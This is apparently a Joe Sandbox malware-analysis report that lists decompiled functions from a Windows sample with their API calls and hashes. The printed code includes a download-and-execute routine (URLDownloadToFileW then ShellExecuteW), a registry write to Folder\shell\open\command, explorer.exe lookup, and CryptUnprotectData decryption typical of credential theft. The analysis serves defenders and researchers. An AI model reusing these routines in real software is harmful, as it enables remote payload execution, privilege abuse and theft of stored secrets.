                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressExitLibraryLoadProcProcess
                                      • String ID: An assertion condition failed$Assert$MessageBoxA$USER32.DLL
                                      • API String ID: 881411216-1361702557
                                      • Opcode ID: 2fcac5fa7fd8d4d1a94a4e208d90b13caf48498e1e2d3c533f9d8648c972c944
                                      • Instruction ID: 99cc2f45e5baeb5a6f8f0d4cf74eda2e2ddaab90960cb2ca85f224f4dbfd2f34
                                      • Opcode Fuzzy Hash: 2fcac5fa7fd8d4d1a94a4e208d90b13caf48498e1e2d3c533f9d8648c972c944
                                      • Instruction Fuzzy Hash: 61D017607E5B22EAEE102BA02D5EB6526A89B23F43F048460BA08970C3C5E148EC8175
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025F6C1, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48registryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025F6C1() {
				void* _v8;
				int _v12;
				int _v16;
				struct _SECURITY_DESCRIPTOR* _v20;
				struct _SECURITY_ATTRIBUTES _v24;
				struct _SECURITY_DESCRIPTOR _v44;
				long _t20;

				if(InitializeSecurityDescriptor( &_v44, 1) == 0 || SetSecurityDescriptorDacl( &_v44, 1, 0, 0) == 0) {
					L5:
					return 0;
				} else {
					_v24 = 0xc;
					_v20 =  &_v44;
					_v16 = 0;
					_t20 = RegCreateKeyExA(0x80000001, "Software\\Classes\\Folder\\shell\\open\\command", 0, 0, 0, 0x20006,  &_v24,  &_v8,  &_v12);
					if(_t20 != 0) {
						SetLastError(_t20);
						goto L5;
					}
					RegCloseKey(_v8);
					return 1;
				}
			}










                                      0x0025f6d6
                                      0x0025f738
                                      0x00000000
                                      0x0025f6ec
                                      0x0025f6ef
                                      0x0025f6f6
                                      0x0025f700
                                      0x0025f71a
                                      0x0025f722
                                      0x0025f732
                                      0x00000000
                                      0x0025f732
                                      0x0025f727
                                      0x00000000
                                      0x0025f72d

                                      APIs
                                      • InitializeSecurityDescriptor.ADVAPI32(?,00000001,00000000,?,?,?,?,?,?,?,?,?,0025F901), ref: 0025F6CE
                                      • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,00000000,00000000,?,?,?,?,?,?,?,?,?,0025F901), ref: 0025F6E2
                                      • RegCreateKeyExA.ADVAPI32(80000001,Software\Classes\Folder\shell\open\command,00000000,00000000,00000000,00020006,0000000C,0025F901,?), ref: 0025F71A
                                      • RegCloseKey.ADVAPI32(0025F901), ref: 0025F727
                                      • SetLastError.KERNEL32(00000000), ref: 0025F732
                                      Strings
                                      • Software\Classes\Folder\shell\open\command, xrefs: 0025F710
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: DescriptorSecurity$CloseCreateDaclErrorInitializeLast
                                      • String ID: Software\Classes\Folder\shell\open\command
                                      • API String ID: 1473660444-2536721355
                                      • Opcode ID: 284ddba4f0383a5a8a9498fb6871da4a2bc3fd4fd6a91693892a5fa271ed133b
                                      • Instruction ID: fb3ede02b7d7fa28212cf6e903206a503abc030386240c371f8c69c8b3b6424e
                                      • Opcode Fuzzy Hash: 284ddba4f0383a5a8a9498fb6871da4a2bc3fd4fd6a91693892a5fa271ed133b
                                      • Instruction Fuzzy Hash: 74011A71951229FADB209FA19D8DEDFBFBCEF19751F004022F905E2180D6B08659CAA0
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 012EBCE2, Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1469COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_12e0000_4ifN8B061M.jbxd
                                      Similarity
                                      • API ID: __floor_pentium4
                                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                      • API String ID: 4168288129-2761157908
                                      • Opcode ID: c111c2fdef7f73d5c6a03afdedb7824bc75b80ab703edd8288aeb216db9df023
                                      • Instruction ID: b3c1a47407b180ba27e55f485fac8b73b1f23b1c6ef17a67916c45cae2acb83c
                                      • Opcode Fuzzy Hash: c111c2fdef7f73d5c6a03afdedb7824bc75b80ab703edd8288aeb216db9df023
                                      • Instruction Fuzzy Hash: FFC27A71E242298FDB25CE68CC487EAB7F9EB48314F5441EAD90DE7240E775AE918F40
                                      Uniqueness

                                      Uniqueness Score: 0.12%

                                      Function 0025FE7E, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025FE7E(void* __ecx, void* __eflags) {
				char _v264;
				intOrPtr _v292;
				void* _v300;
				int _t11;
				void* _t22;

				_t22 = CreateToolhelp32Snapshot(2, 0);
				E00251052( &_v300, 0, 0x128);
				_v300 = 0x128;
				_t11 = Process32First(_t22,  &_v300);
				while(_t11 != 0) {
					if(E002510E6( &_v264, "explorer.exe") == 0) {
						return _v292;
					}
					_t11 = Process32Next(_t22,  &_v300);
				}
				CloseHandle(_t22);
				return 0;
			}








                                      0x0025fe98
                                      0x0025fea4
                                      0x0025feac
                                      0x0025feba
                                      0x0025fee7
                                      0x0025fed7
                                      0x00000000
                                      0x0025fef8
                                      0x0025fee1
                                      0x0025fee1
                                      0x0025feec
                                      0x00000000

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0025FE8D
                                      • Process32First.KERNEL32(00000000,?), ref: 0025FEBA
                                      • Process32Next.KERNEL32(00000000,?), ref: 0025FEE1
                                      • CloseHandle.KERNEL32(00000000), ref: 0025FEEC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID: explorer.exe
                                      • API String ID: 420147892-3187896405
                                      • Opcode ID: d09e3b9a5e4a1d9d28f951b76bac268afc75d580f85b4f7881bffba1c33f0c28
                                      • Instruction ID: 6ee70c4945ab4dad699d8dcf4b6acce5b5dfcec79b628a3e0935e14068c7d8ac
                                      • Opcode Fuzzy Hash: d09e3b9a5e4a1d9d28f951b76bac268afc75d580f85b4f7881bffba1c33f0c28
                                      • Instruction Fuzzy Hash: C501D672615114ABD7609B60AC4AFDA73BCDB46311F1000A1FD05E2181EB74DEA88A58
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 0025EC17, Relevance: 7.5, APIs: 5, Instructions: 44processCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025EC17(signed int* __ecx, void* __edx) {
				char _v524;
				intOrPtr _v552;
				void* _v560;
				struct tagPROCESSENTRY32W* _t8;
				void* _t14;
				void* _t18;
				signed int* _t19;

				_t14 = __edx;
				_v560 = 0x22c;
				_t19 = __ecx;
				_t18 = CreateToolhelp32Snapshot(2, 0);
				if(_t18 == 0xffffffff) {
					L6:
					 *_t19 =  *_t19 & 0x00000000;
				} else {
					_t8 =  &_v560;
					Process32FirstW(_t18, _t8);
					while(_t8 != 0) {
						if(_v552 == _t14) {
							CloseHandle(_t18);
							E00253412(_t19,  &_v524);
						} else {
							_t8 = Process32NextW(_t18,  &_v560);
							continue;
						}
						goto L7;
					}
					CloseHandle(_t18);
					goto L6;
				}
				L7:
				return _t19;
			}










                                      0x0025ec27
                                      0x0025ec29
                                      0x0025ec33
                                      0x0025ec3b
                                      0x0025ec40
                                      0x0025ec73
                                      0x0025ec73
                                      0x0025ec42
                                      0x0025ec42
                                      0x0025ec4a
                                      0x0025ec68
                                      0x0025ec58
                                      0x0025ec7e
                                      0x0025ec8d
                                      0x0025ec5a
                                      0x0025ec62
                                      0x00000000
                                      0x0025ec62
                                      0x00000000
                                      0x0025ec58
                                      0x0025ec6d
                                      0x00000000
                                      0x0025ec6d
                                      0x0025ec77
                                      0x0025ec7c

                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0025EC35
                                      • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0025EC4A
                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 0025EC62
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EC6D
                                      • CloseHandle.KERNEL32(00000000), ref: 0025EC7E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandleProcess32$CreateFirstNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 1789362936-0
                                      • Opcode ID: 37da82ac6788abc8e97a08dc683066b41f631482eb009508c054ed109b5dedf7
                                      • Instruction ID: 61b672222cc2958e83294f0e8a4f8cc7db7203144c8ce9cbff7456b251703c41
                                      • Opcode Fuzzy Hash: 37da82ac6788abc8e97a08dc683066b41f631482eb009508c054ed109b5dedf7
                                      • Instruction Fuzzy Hash: 0101D671200215ABDB345FA4BC4DB7F76BCEB45727F2040AAE905D2190D7B08E498B54
                                      Uniqueness

                                      Uniqueness Score: 0.68%

                                      Function 002592D8, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                      Download Yara Rule
                                      C-Code - Quality: 24%
                                      			E002592D8(intOrPtr __ecx, WCHAR* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				char _v24;
				char _v8216;
				char* _t24;
				signed int _t27;
				WCHAR* _t29;
				intOrPtr _t30;
				signed int* _t31;
				intOrPtr _t32;
				void* _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				void* _t38;
				void* _t39;

				_t30 = __ecx;
				E00251130(0x2014, __ecx);
				_t36 = _a4;
				_t29 = __edx;
				_v8 = _t30;
				_t3 = _t36 - 1; // -1
				_t34 = GlobalAlloc(0x40, _t3);
				_t38 = 1;
				if(_t36 > 1) {
					_t32 = _v8;
					do {
						 *((char*)(_t34 + _t38 - 1)) =  *((intOrPtr*)(_t38 + _t32));
						_t38 = _t38 + 1;
					} while (_t38 < _t36);
				}
				_t8 = _t36 - 1; // -1
				_v12 = _t34;
				_v16 = _t8;
				_t39 = 0;
				_t24 =  &_v16;
				__imp__CryptUnprotectData(_t24, 0, 0, 0, 0, 0,  &_v24);
				if(_t24 == 0) {
					_push(L"Could not decrypt");
				} else {
					if(_t36 > 0) {
						_t35 = _v20;
						_t31 =  &_v8216;
						do {
							_t27 =  *(_t35 + _t39) & 0x000000ff;
							_t39 = _t39 + 2;
							 *_t31 = _t27;
							_t31 =  &(_t31[0]);
						} while (_t39 < _t36);
					}
					_push( &_v8216);
				}
				return lstrcpyW(_t29, ??);
			}




















                                      0x002592d8
                                      0x002592e0
                                      0x002592e8
                                      0x002592eb
                                      0x002592ed
                                      0x002592f0
                                      0x002592fe
                                      0x00259300
                                      0x00259303
                                      0x00259305
                                      0x00259308
                                      0x0025930b
                                      0x0025930f
                                      0x00259310
                                      0x00259308
                                      0x00259314
                                      0x00259317
                                      0x0025931a
                                      0x0025931d
                                      0x00259328
                                      0x0025932c
                                      0x00259334
                                      0x0025935d
                                      0x00259336
                                      0x00259338
                                      0x0025933a
                                      0x0025933d
                                      0x00259343
                                      0x00259343
                                      0x00259347
                                      0x0025934a
                                      0x0025934d
                                      0x00259350
                                      0x00259343
                                      0x0025935a
                                      0x0025935a
                                      0x0025936d

                                      APIs
                                      • GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0025928C,00001000,?,00000000,00001000), ref: 002592F6
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0025928C), ref: 0025932C
                                      • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00259363
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                      • String ID: Could not decrypt
                                      • API String ID: 3112367126-1484008118
                                      • Opcode ID: bc5fef7ad4fd6a7e9b3465423f609c5cc2d81ec8aa4d96492785f4dc08b5d291
                                      • Instruction ID: 1f9b51e9b405b9a28d9930f13b5c854bd558b0c97e6e5405c8beefc2a666c443
                                      • Opcode Fuzzy Hash: bc5fef7ad4fd6a7e9b3465423f609c5cc2d81ec8aa4d96492785f4dc08b5d291
                                      • Instruction Fuzzy Hash: 0211297291061AEBCB11CF98C8849EEF7BCEF49701B1080A5DD55E3251E2319E59CBB0
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      Function 0025D508, Relevance: 6.1, APIs: 4, Instructions: 63memoryUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 100%
                                      			E0025D508(void* __ecx, void* __eflags) {
				void* _v8;
				short _v12;
				struct _SID_IDENTIFIER_AUTHORITY _v16;
				long _v20;
				long _v24;
				union _SID_NAME_USE _v28;
				short _v60;
				short _v580;
				void* _t37;

				_v20 = 0x10;
				_v8 = 0;
				_t37 = __ecx;
				_v16.Value = 0;
				_v12 = 0x500;
				E00251052( &_v580, 0, 0x208);
				_v24 = 0x104;
				if(AllocateAndInitializeSid( &_v16, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0,  &_v8) == 0 || LookupAccountSidW(0, _v8,  &_v580,  &_v24,  &_v60,  &_v20,  &_v28) == 0) {
					GetLastError();
				}
				if(_v8 != 0) {
					FreeSid(_v8);
				}
				E00253412(_t37,  &_v580);
				return _t37;
			}












                                      0x0025d515
                                      0x0025d527
                                      0x0025d52c
                                      0x0025d52e
                                      0x0025d531
                                      0x0025d537
                                      0x0025d53f
                                      0x0025d565
                                      0x0025d58c
                                      0x0025d58c
                                      0x0025d595
                                      0x0025d59a
                                      0x0025d59a
                                      0x0025d5a9
                                      0x0025d5b3

                                      APIs
                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0025B7F2,?,?,00000001), ref: 0025D55D
                                      • LookupAccountSidW.ADVAPI32(00000000,0025B7F2,?,00000104,?,00000010,?), ref: 0025D582
                                      • GetLastError.KERNEL32(?,?,00000001), ref: 0025D58C
                                      • FreeSid.ADVAPI32(0025B7F2,?,?,00000001), ref: 0025D59A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                      • String ID:
                                      • API String ID: 1866703397-0
                                      • Opcode ID: be6781ff517a0fc897bd14bd40a47fec617a7c7b4ea302be0c97477e5d16883c
                                      • Instruction ID: 1f8dd84cba889c88d8a9f70277904d59d4d198999908639e12fcc3179048a7b7
                                      • Opcode Fuzzy Hash: be6781ff517a0fc897bd14bd40a47fec617a7c7b4ea302be0c97477e5d16883c
                                      • Instruction Fuzzy Hash: 8B11DAB190021DEBDB10DFD4DD89EEEB7BCFB08745F504066E605E2190E7709B589BA4
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Function 00252675, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkUNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 92%
                                      			E00252675(void* __ecx, void* __eflags, signed int _a4) {
				short* _v12;
				void* _v16;
				char _v20;
				void* _t26;
				void* _t36;
				void* _t38;
				void* _t42;
				void* _t58;
				void* _t59;

				_t66 = __eflags;
				_t42 = __ecx;
				_t58 = 0x1a;
				E0025D75B( &_v12, _t58, __eflags);
				_t59 = 0xa;
				_t26 = E002532D4( &_v16, _t59, __eflags);
				E00253162(E00253297( &_v12, _t59, _t66, "\\"), _t66, _t26);
				E00255A2D(_v16);
				_t61 = _a4 + 4;
				E0025345A( &_v16, _a4 + 4);
				E00253162( &_v12, _t66, E0025334A( &_v16,  &_a4));
				E00255A2D(_a4);
				_a4 = _a4 & 0x00000000;
				E00255A2D(_v16);
				_t36 = E0025345A( &_a4, _t61);
				__imp__URLDownloadToFileW(0, _a4, _v12, 0, 0);
				E00255A2D(_a4);
				if(_t36 == 0) {
					_t38 = ShellExecuteW(0, L"open", _v12, 0, 0, 5);
					_v16 = 2;
					__eflags = _t38 - 0x20;
					if(_t38 > 0x20) {
						_v16 = 0;
					}
				} else {
					_v16 = 1;
				}
				_v20 = 0x262784;
				E00254B53(_t42,  &_v20);
				return E00255A2D(_v12);
			}












                                      0x00252675
                                      0x0025267e
                                      0x00252685
                                      0x00252686
                                      0x0025268d
                                      0x00252691
                                      0x002526a8
                                      0x002526b0
                                      0x002526bb
                                      0x002526bf
                                      0x002526d4
                                      0x002526dc
                                      0x002526e4
                                      0x002526e8
                                      0x002526f4
                                      0x00252702
                                      0x0025270d
                                      0x00252714
                                      0x0025272c
                                      0x00252732
                                      0x00252739
                                      0x0025273c
                                      0x0025273e
                                      0x0025273e
                                      0x00252716
                                      0x00252716
                                      0x00252716
                                      0x00252744
                                      0x0025274e
                                      0x0025275f

                                      APIs
                                        • Part of subcall function 0025D75B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0025D78C
                                        • Part of subcall function 00253162: lstrcatW.KERNEL32(00000000,?), ref: 00253192
                                        • Part of subcall function 00255A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0025E2AE,?,?,?,?,?,00000000), ref: 00255A35
                                        • Part of subcall function 0025345A: lstrcpyW.KERNEL32(00000000,?), ref: 00253484
                                        • Part of subcall function 0025334A: PathFindExtensionW.SHLWAPI(?), ref: 00253354
                                      • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00252702
                                      • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0025272C
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                      • String ID: open
                                      • API String ID: 4166385161-2758837156
                                      • Opcode ID: 24f1ffb9f78c6d7ec9ffc4e93bc00436ee604fa1ae48593ce115ef6e057bd559
                                      • Instruction ID: 988bc6288d43cc7d099b1326c10fdd01bbec564ca15bdde61adb79e34492c1a4
                                      • Opcode Fuzzy Hash: 24f1ffb9f78c6d7ec9ffc4e93bc00436ee604fa1ae48593ce115ef6e057bd559
                                      • Instruction Fuzzy Hash: 4121B432D10108B7CB14EFA0C896DEEBB78AF85742F108058FC1667191DB709A5DCF94
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 0025DFC9, Relevance: 4.6, APIs: 3, Instructions: 90UNIQUE
                                      Download Yara Rule
                                      C-Code - Quality: 85%
                                      			E0025DFC9(intOrPtr __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				int _v20;
				WCHAR* _v24;
				intOrPtr _v28;
				signed int _v32;
				intOrPtr _v36;
				char _v40;
				WCHAR* _t33;
				intOrPtr _t34;
				int _t44;
				WCHAR* _t54;
				signed int _t72;
				intOrPtr _t74;
				int _t75;
				long _t76;
				WCHAR* _t77;
				void* _t78;
				void* _t79;

				_t74 = __ecx;
				_v12 = __ecx;
				_t33 = E00255ADB(0x208);
				_v32 = _v32 & 0x00000000;
				_t54 = _t33;
				_t34 = 5;
				_v28 = _t34;
				_v36 = _t34;
				E00251996( &_v40, __eflags);
				_t76 = GetLogicalDriveStringsW(0x104, _t54);
				_t81 = _t76 - 0x104;
				if(_t76 > 0x104) {
					_t72 = 2;
					_t54 = E00255ADB( ~(0 | _t81 > 0x00000000) | _t36 * _t72);
					GetLogicalDriveStringsW(_t76, _t54);
				}
				_t77 = 0;
				if( *_t54 != 0) {
					do {
						_v24 = _t77;
						E00253264( &_v24, E00253412( &_v8, _t54));
						E00255A2D(_v8);
						_v8 = _t77;
						_t44 = GetDriveTypeW(_v24);
						_t79 = _t79 - 0xc;
						_t75 = _t44;
						_t78 = _t79;
						_v20 = _t75;
						E0025345A(_t78,  &_v24);
						 *(_t78 + 4) = _t75;
						 *((intOrPtr*)(_t78 + 8)) = _v16;
						E002518A3( &_v40);
						_t54 =  &(( &(_t54[E0025308E( &_v24)]))[1]);
						E00255A2D(_v24);
						_t77 = 0;
						_v24 = 0;
						_t84 =  *_t54;
					} while ( *_t54 != 0);
					_t74 = _v12;
				}
				E00251348(_t74, _t84,  &_v40);
				_t60 = _v40;
				if(_v40 != 0) {
					E00251AA0(_t60, _t60);
				}
				return _t74;
			}























                                      0x0025dfd2
                                      0x0025dfd9
                                      0x0025dfdc
                                      0x0025dfe1
                                      0x0025dfea
                                      0x0025dfec
                                      0x0025dfed
                                      0x0025dff0
                                      0x0025dff3
                                      0x0025e004
                                      0x0025e006
                                      0x0025e00c
                                      0x0025e012
                                      0x0025e021
                                      0x0025e025
                                      0x0025e025
                                      0x0025e02b
                                      0x0025e030
                                      0x0025e032
                                      0x0025e036
                                      0x0025e042
                                      0x0025e04a
                                      0x0025e052
                                      0x0025e055
                                      0x0025e05b
                                      0x0025e05e
                                      0x0025e060
                                      0x0025e062
                                      0x0025e06b
                                      0x0025e076
                                      0x0025e079
                                      0x0025e07c
                                      0x0025e08f
                                      0x0025e092
                                      0x0025e097
                                      0x0025e099
                                      0x0025e09c
                                      0x0025e09c
                                      0x0025e0a1
                                      0x0025e0a1
                                      0x0025e0aa
                                      0x0025e0af
                                      0x0025e0b4
                                      0x0025e0b7
                                      0x0025e0b7
                                      0x0025e0c2

                                      APIs
                                        • Part of subcall function 00255ADB: GetProcessHeap.KERNEL32(00000000,000000F4,0025E415,?,?,00000000,002555C4,?,?,00000000), ref: 00255ADE
                                        • Part of subcall function 00255ADB: HeapAlloc.KERNEL32(00000000,?,00000000,002555C4,?,?,00000000), ref: 00255AE5
                                      • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 0025DFFE
                                      • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0025E025
                                      • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 0025E055
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424095892.00251000.00000020.00000001.sdmp, Offset: 00250000, based on PE: true
                                      • Associated: 00000000.00000002.424087091.00250000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424120535.00262000.00000002.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424130627.00266000.00000004.00000001.sdmp Download File
                                      • Associated: 00000000.00000002.424138873.00268000.00000002.00000001.sdmp Download File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_250000_4ifN8B061M.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                      • String ID:
                                      • API String ID: 2408535517-0
                                      • Opcode ID: 0ff79fd8a09b05773bcd6417ea6ede6b1101fda48e7cd2d157321211b5d54e04
                                      • Instruction ID: 1e097e311d9ca6e73c201c74d903aebd16d443f38ff42caefd4e11ac8605e251
                                      • Opcode Fuzzy Hash: 0ff79fd8a09b05773bcd6417ea6ede6b1101fda48e7cd2d157321211b5d54e04
                                      • Instruction Fuzzy Hash: D4318271E102199BCF15EFA4C5969EEB7F8EF48342F104069E902B7281DB705E19CFA5
                                      Uniqueness

                                      Uniqueness Score: 37.75%

                                      Function 012E5F98, Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • IsDebuggerPresent.KERNEL32 ref: 012E6090
                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 012E609A
                                      • UnhandledExceptionFilter.KERNEL32(?), ref: 012E60A7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.424346882.012E1000.00000020.00020000.sdmp, Offset: 012E0000, based on PE: true
                                      • Associated: 00000000.00000002.424335940.012E0000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424399292.01302000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424424990.0130B000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424434447.0130C000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424444007.0130D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424454583.0130F000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424487286.013A0000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424497060.013A1000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424508147.013A4000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424518494.013A5000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424528540.013A7000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424539586.013A9000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424554021.013AD000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424563735.013AE000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424574199.013B1000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.424583869.013B3000.00000002.00020000.sdmp Download File
